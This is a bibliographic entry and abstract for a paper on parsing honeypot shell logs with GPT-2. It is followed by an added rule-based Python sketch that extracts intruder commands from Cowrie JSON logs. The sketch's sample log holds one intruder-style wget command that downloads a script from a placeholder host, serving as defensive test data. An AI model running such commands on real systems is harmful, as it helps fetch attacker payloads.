GPT-2C: a parser for honeypot logs using large pre-trained language models

Proceedings of the 2021 IEEE/ACM International Conference on Advances in Social Networks Analysis and Mining. Pub Date: 2021-11-08. DOI: 10.1145/3487351.3492723

Febrian Setianto, Erion Tsani, Fatima Sadiq, Georgios Domalis, Dimitris Tsakalidis, Panos Kostakos


Citations: 13

Abstract

Deception technologies like honeypots generate large volumes of log data, which include illegal Unix shell commands used by latent intruders. Several prior works have reported promising results in overcoming the weaknesses of network-level and program-level Intrusion Detection Systems (IDSs) by fusing network traffic with data from honeypots. However, because honeypots lack the plug-in infrastructure to enable real-time parsing of log outputs, it remains technically challenging to feed illegal Unix commands into downstream predictive analytics. As a result, advances in honeypot-based user-level IDSs remain greatly hindered. This article presents a run-time system (GPT-2C) that leverages a large pre-trained language model (GPT-2) to parse dynamic logs generated by a live Cowrie SSH honeypot instance. After fine-tuning the GPT-2 model on an existing corpus of illegal Unix commands, the model achieved 89% inference accuracy in parsing Unix commands with acceptable execution latency.
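
To make the parsing task concrete, the sketch below pulls attacker-entered commands out of Cowrie's JSON log lines with plain rules. It is not the GPT-2C model and is not taken from the paper; it is a simple rule-based baseline of the kind a learned parser could be compared against. It assumes Cowrie's JSON output, in which each line is one event and typed commands appear under the event id `cowrie.command.input` with the text in the `input` field. The function name `extract_commands` and the sample lines are hypothetical.

```python
import json
from typing import Iterable, Iterator


def extract_commands(lines: Iterable[str]) -> Iterator[dict]:
    """Yield one record per shell command found in Cowrie JSON log lines.

    Assumption: each line is a JSON object, and commands typed by the
    intruder are logged with eventid "cowrie.command.input".
    """
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            # A live log can contain partially written or corrupt lines.
            continue
        if not isinstance(event, dict):
            continue
        if event.get("eventid") != "cowrie.command.input":
            continue
        yield {
            "session": event.get("session"),
            "timestamp": event.get("timestamp"),
            "command": event.get("input", ""),
        }


# Hypothetical sample lines, written for illustration only.
SAMPLE_LOG = [
    '{"eventid": "cowrie.session.connect", "session": "a1", "src_ip": "192.0.2.10"}',
    '{"eventid": "cowrie.command.input", "session": "a1", '
    '"timestamp": "2021-11-08T00:00:00Z", "input": "uname -a"}',
    "not json",
    '{"eventid": "cowrie.command.input", "session": "a1", '
    '"timestamp": "2021-11-08T00:00:05Z", "input": "wget http://example.invalid/x.sh"}',
]

if __name__ == "__main__":
    for record in extract_commands(SAMPLE_LOG):
        print(record["session"], record["command"])
```

A rule-based extractor like this only works while the log schema stays fixed, which is one reason a learned parser may be attractive for dynamic logs.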

